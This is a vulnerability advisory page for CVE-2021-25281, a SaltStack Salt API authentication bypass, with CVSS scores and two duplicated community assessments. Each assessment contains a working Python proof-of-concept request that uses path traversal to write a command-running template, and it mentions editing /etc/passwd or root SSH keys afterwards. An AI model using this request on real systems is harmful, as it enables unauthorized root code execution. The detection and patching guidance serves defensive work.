9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
Recent assessments:
kevthehermit at February 26, 2021 5:08pm UTC reported:
<https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/>
This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async
client no checks are made to verify the requester is authenticated.
Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.
This is fairly trivial to exploit in order to run jobs against the salt master, however, there are some limitation in what actions you can perform. There is no cmd execution function.
a very simple example
import requests
response = requests.post(
'https://127.0.0.1:8000/run',
verify=False,
json={
'eauth': 'auto',
'client': 'wheel_async',
'fun': 'pillar_roots.write',
'data': '{{ salt["cmd.run"]("id > /tmp/whoami") }}',
'path': '../../../../../../srv/salt/pwn.sls',
},
)
if json := response.json():
print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')
You can edit the salt master configuration variables which include the ability to set the auth_mode
and sharedsecrets
if the API is restarted your changes take effect at which point you gain the ability to execute code against the master.
You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. The default installation on Ubuntu the API runs as root so you can use actions like editing /etc/passwd
or writing ssh-keys to /root/.ssh/id_rsa
POC available at <https://github.com/Immersive-Labs-Sec/CVE-2021-25281>
The API typically runs on HTTPS so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async
functionality every request to the instance will create a salt job. Salt stores the input and output of every job on disk so can be easy to review post compromise activity.
More details can be found in this article – <https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.
cdelafuente-r7 at April 09, 2021 4:04pm UTC reported:
<https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/>
This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async
client no checks are made to verify the requester is authenticated.
Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.
This is fairly trivial to exploit in order to run jobs against the salt master, however, there are some limitation in what actions you can perform. There is no cmd execution function.
a very simple example
import requests
response = requests.post(
'https://127.0.0.1:8000/run',
verify=False,
json={
'eauth': 'auto',
'client': 'wheel_async',
'fun': 'pillar_roots.write',
'data': '{{ salt["cmd.run"]("id > /tmp/whoami") }}',
'path': '../../../../../../srv/salt/pwn.sls',
},
)
if json := response.json():
print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')
You can edit the salt master configuration variables which include the ability to set the auth_mode
and sharedsecrets
if the API is restarted your changes take effect at which point you gain the ability to execute code against the master.
You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. The default installation on Ubuntu the API runs as root so you can use actions like editing /etc/passwd
or writing ssh-keys to /root/.ssh/id_rsa
POC available at <https://github.com/Immersive-Labs-Sec/CVE-2021-25281>
The API typically runs on HTTPS so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async
functionality every request to the instance will create a salt job. Salt stores the input and output of every job on disk so can be easy to review post compromise activity.
More details can be found in this article – <https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5
packetstormsecurity.com/files/162058/SaltStack-Salt-API-Unauthenticated-Remote-Command-Execution.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25281
github.com/saltstack/salt/releases
lists.fedoraproject.org/archives/list/[email protected]/message/7GRVZ5WAEI3XFN2BDTL6DDXFS5HYSDVB/
lists.fedoraproject.org/archives/list/[email protected]/message/FUGLOJ6NXLCIFRD2JTXBYQEMAEF2B6XH/
lists.fedoraproject.org/archives/list/[email protected]/message/YOGNT2XWPOYV7YT75DN7PS4GIYWFKOK5/
saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/
security.gentoo.org/glsa/202103-01
www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P